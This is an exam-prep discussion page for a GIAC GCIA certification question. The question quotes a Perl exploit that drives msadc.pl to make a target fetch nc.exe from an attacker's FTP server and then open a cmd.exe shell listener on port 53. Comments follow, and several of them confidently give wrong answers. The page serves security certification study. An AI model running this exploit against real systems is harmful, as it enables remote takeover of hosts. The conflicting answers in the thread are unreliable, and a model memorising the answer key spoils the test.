Cyber Monday 2024! Hurry Up, Grab the Special Discount - Save 25% - Ends In 00:00:00 Coupon code: SAVE25
Welcome to Pass4Success

- Free Preparation Discussions

GIAC Exam GCIA Topic 7 Question 50 Discussion

Actual exam question for GIAC's GCIA exam
Question #: 50
Topic #: 7
[All GCIA Questions]

Adam, a malicious hacker performs an exploit, which is given below:

#################################################################

$port = 53;

# Spawn cmd.exe on port X

$your = "192.168.1.1";# Your FTP Server 89

$user = "Anonymous";# login as

$pass = 'noone@nowhere.com';# password

#################################################################

$host = $ARGV[0];

print "Starting ...\n";

print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h

$host -C \"echo

open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system

("perl msadc.pl -h

$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");

system("perl

msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get

hacked.

html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is

downloading ...

\n";

system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is

finished ...

(Have a ftp server)\n";

$o=; print "Opening ...\n";

system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";

#system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

Show Suggested Answer Hide Answer
Suggested Answer: D

Contribute your Thoughts:

Joaquin
5 months ago
I'm leaning towards C) Creates an FTP server with write permissions enabled as the expected result.
upvoted 0 times
...
Kimberlie
5 months ago
This is some pretty advanced stuff! I'm just impressed someone was able to come up with this kind of exploit. But I'm not sure I want to try it out myself.
upvoted 0 times
...
Mari
5 months ago
I think the answer is C. It's creating an FTP server with write permissions, which could be a pretty serious security vulnerability.
upvoted 0 times
Marcos
3 months ago
We should always be vigilant about such exploits and take necessary precautions to protect our systems.
upvoted 0 times
...
Candida
3 months ago
Yes, it can allow the attacker to upload malicious files or even take control of the target system.
upvoted 0 times
...
Annice
3 months ago
I agree, creating an FTP server with write permissions is definitely a serious security vulnerability.
upvoted 0 times
...
Mammie
3 months ago
That's true. It's important to be aware of these types of exploits to protect against potential security threats.
upvoted 0 times
...
Cassi
3 months ago
Yes, you're right. Creating an FTP server with write permissions can definitely pose a security risk.
upvoted 0 times
...
Cordelia
3 months ago
I think the answer is C. It's creating an FTP server with write permissions, which could be a pretty serious security vulnerability.
upvoted 0 times
...
...
Barbra
5 months ago
I think it might be B) Creates a share called 'sasfile' on the target system.
upvoted 0 times
...
Margarita
5 months ago
I disagree, I believe the result is A) Opens up a SMTP server that requires no username or password.
upvoted 0 times
...
Keva
5 months ago
Haha, a telnet listener with no username or password? That's just begging to be exploited! I don't think that's the right answer.
upvoted 0 times
Yesenia
4 months ago
I think the correct answer might be creating a share called 'sasfile' on the target system. That seems more in line with the exploit.
upvoted 0 times
...
Rosenda
4 months ago
I agree, that does sound like a risky move. What do you think the right answer is?
upvoted 0 times
...
...
William
5 months ago
Hmm, this looks like it's creating an FTP server on the target system and downloading some files. Interesting, but I'm not sure it's the right approach.
upvoted 0 times
...
Irving
5 months ago
I think the expected result is D) Opens up a telnet listener that requires no username or password.
upvoted 0 times
...
Miesha
5 months ago
Wow, this is some serious hacking stuff! I'm not sure I'm comfortable with the idea of exploiting systems, even if it's just for a test.
upvoted 0 times
Brett
4 months ago
I think it's crucial to always consider the potential consequences of our actions in the digital world.
upvoted 0 times
...
Nu
4 months ago
Absolutely, hacking should only be done with permission and for legitimate security testing.
upvoted 0 times
...
Hollis
4 months ago
I agree, hacking should only be done for ethical purposes.
upvoted 0 times
...
Casandra
5 months ago
I agree, it's important to always use our skills for good and ethical purposes.
upvoted 0 times
...
Alease
5 months ago
It's definitely concerning to see how easily systems can be exploited.
upvoted 0 times
...
Giovanna
5 months ago
It's definitely important to stay ethical when it comes to hacking.
upvoted 0 times
...
...

Save Cancel